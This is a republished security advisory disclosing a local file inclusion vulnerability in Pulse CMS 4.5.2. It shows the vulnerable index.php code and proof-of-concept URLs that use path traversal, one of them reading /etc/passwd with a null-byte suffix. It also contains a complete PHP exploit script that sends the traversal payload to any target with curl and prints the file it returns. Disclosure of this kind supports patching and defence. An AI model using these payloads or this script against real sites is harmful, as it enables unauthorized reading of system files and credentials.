Home / os / winmobile

Pulse CMS 4.5.2 Local File Inclusion

Posted on 29 February 2016

Document Title: =============== Pulse CMS 4.5.2 - Local File Inclusion References (Source): ==================== http://ehsansec.ir/advisories/plusecms452-lfi.txt Release Date: ============= 2016-02-28 Product & Service Introduction: =============================== Pulse CMS is the easiest way to build and deploy a responsive, content managed website. Since it's a flat file CMS there is no complicated database setup, just copy it to your server and go.(https://www.pulsecms.com/) Software Link: ============== http://www.pulsecms.com/download/pulse.zip Vulnerability Type: ========================= Local File Inclusion Vulnerability Details: ============================== I discovered a local file inclusion vulnerability in Pulse CMS 4.5.2. Exploitation Technique: ======================= Remote Severity Level: =============== High Vulnerable File & Code: ======================= index.php 9 $page = (isset($_GET['p']) && !empty($_GET['p'])) ? $_GET['p'] : 'home'; 10 $page = htmlspecialchars($page, ENT_QUOTES, 'UTF-8'); 11 12 if (preg_match("///", $page)){ 13 if(file_exists("content/pages/".$page."home.txt")){ 14 $page = $page."home"; 15 } 16 } 27 include("content/pages/$page.txt"); Proof of Concept (PoC): ======================= -- Local File Inclusion -- http://localhost/pluse/index.php?p=../../../../YourPHP.php -- For include other type files use null byte nullbyte -- http://localhost/pluse/index.php?p=../../../../etc/passwd%00.php PHP Exploit <?php # index.php $target = $argv[1]; $file = $argv[2]; // page : index.php echo "Pulse CMS 4.5.2 - Local File Inclusion "; echo "Author : Ehsan Hosseini "; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_URL, $target.'index.php?p='.$file."%00.php"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); $ex = curl_exec ($ch); curl_close($ch); unset($ch); echo $ex; ?> Author: ================== Ashiyane Digital Security Team Ehsan Hosseini http://ehsansec.ir/ SPX tnx to: =========== Bl4ck_mohajem Contact: ======== hehsan979@gmail.com info@ehsansec.ir

 

TOP